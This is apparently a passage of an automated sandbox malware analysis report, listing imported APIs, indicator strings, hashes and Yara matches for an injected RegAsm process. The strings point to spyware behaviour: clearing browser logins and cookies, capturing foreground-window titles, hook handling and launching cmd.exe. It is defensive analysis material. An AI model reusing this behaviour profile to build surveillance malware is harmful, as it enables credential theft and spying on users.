                                                                                                                                                                      • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                                                                                                      • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                                                                                                                      • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                      • String ID: /C $cmd.exe$open
                                                                                                                                                                      • API String ID: 587946157-3896048727
                                                                                                                                                                      • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                      • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                                                                                      APIs
                                                                                                                                                                      • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                      • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                      • String ID: pth_unenc
                                                                                                                                                                      • API String ID: 3123878439-4028850238
                                                                                                                                                                      • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                      • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                                                                      • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                      • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                      • API String ID: 1646373207-2714051624
                                                                                                                                                                      • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                                      • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                                                                      • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                      • API String ID: 2574300362-1519888992
                                                                                                                                                                      • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                                      • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                                                                      • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                                      • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                      • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                      • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                                                      • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                      • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                                      • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                                      • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                                                                                      • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                      • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                      • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                      • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                      • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                      • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                                                                                      • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                      • API String ID: 3472027048-1236744412
                                                                                                                                                                      • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                                                      • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                                                                                                      • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                                                      • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                                                                                                      • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                                                                                                      • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                                                                                                      • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1432082543-0
                                                                                                                                                                      • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                                                      • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                                                                                                      • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                                                      • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseHandleReadSize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3642004256-0
                                                                                                                                                                      • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                      • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                      • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                      • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                                                                                        • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                                                                        • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                      • String ID: [ $ ]
                                                                                                                                                                      • API String ID: 3309952895-93608704
                                                                                                                                                                      • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                      • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                                                                      • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                      • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 188215759-0
                                                                                                                                                                      • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                                                      • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                                                                                                      • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                                                      • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                                      • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                                                                      • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                                      • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                                                                      • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                                      • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleOpenProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 39102293-0
                                                                                                                                                                      • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                                                      • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                                                                                                      • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                                                                        • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2633735394-0
                                                                                                                                                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                      • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                                                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                      • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4116985748-0
                                                                                                                                                                      • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                      • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                                                      • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                                                                        • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
